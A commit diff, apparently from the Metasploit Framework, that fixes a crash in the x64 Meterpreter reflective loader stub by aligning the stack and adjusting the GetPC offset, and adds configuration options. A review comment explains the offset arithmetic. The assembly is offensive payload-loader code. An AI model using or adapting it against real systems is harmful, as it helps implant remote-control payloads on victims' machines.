Fix stager crash and support pivots in x64 meterp loader

bug/bundler_fix
OJ 2017-08-07 20:01:57 +10:00 committed by Brent Cook
parent c8b8ef03bd
commit 4ec87985a2
1 changed files with 11 additions and 9 deletions


@ -42,19 +42,20 @@ module Payload::Windows::MeterpreterLoader_x64
push rbp ; save rbp push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls. sub rsp, 32 ; allocate some space for calls.
and rsp, ~0xF ; Ensure RSP is 16 byte aligned
; GetPC ; GetPC
call $+5 ; relative call to get location call $+5 ; relative call to get location
pop rbx ; pop return value pop rbx ; pop return value
; Invoke ReflectiveLoader() ; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() ; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)} add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
call rbx ; invoke ReflectiveLoader() call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr) ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
; offset from ReflectiveLoader() to the end of the DLL ; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
^ ^
unless opts[:stageless] unless opts[:stageless] || opts[:force_write_handle] == true
asm << %Q^ asm << %Q^
; store the comms socket or handle ; store the comms socket or handle
mov [rbx], rdi mov [rbx], rdi
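Review bot: The constant on the `add rbx, … - 0x15` line is a hand-maintained byte count — the distance from the stub's first instruction to the return address popped into rbx by `call $+5` — and nothing in the hunk says so; the bump from 0x11 to 0x15 appears to match the 4-byte encoding of the inserted `and rsp, ~0xF`, which is the only way a reader can reconstruct the value. A comment on that line would stop the next inserted instruction from silently re-breaking the GetPC arithmetic: `; 0x15 = bytes from stub start to the address popped into rbx; adjust if any instruction above changes size`. Under the usual encodings the visible push/mov/sub/and/call sequence is 17 bytes, so the remaining 4 must come from instructions before line 42; the stub and the enclosing Ruby method both begin and end outside this hunk, so the comment should state that the count covers those too. Placing the mask after `sub rsp, 32` is sound, since it can only widen the gap between rbp and rsp and therefore leaves the shadow space intact at `call rbx`.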
@ -79,13 +80,14 @@ module Payload::Windows::MeterpreterLoader_x64
# create the configuration block, which for staged connections is really simple. # create the configuration block, which for staged connections is really simple.
config_opts = { config_opts = {
arch: opts[:uuid].arch, arch: opts[:uuid].arch,
exitfunk: ds['EXITFUNC'], null_session_guid: opts[:null_session_guid] == true,
expiration: ds['SessionExpirationTimeout'].to_i, exitfunk: ds[:exit_func] || ds['EXITFUNC'],
uuid: opts[:uuid], expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
transports: opts[:transport_config] || [transport_config(opts)], uuid: opts[:uuid],
extensions: [], transports: opts[:transport_config] || [transport_config(opts)],
stageless: opts[:stageless] == true extensions: [],
stageless: opts[:stageless] == true
} }
# create the configuration instance based off the parameters # create the configuration instance based off the parameters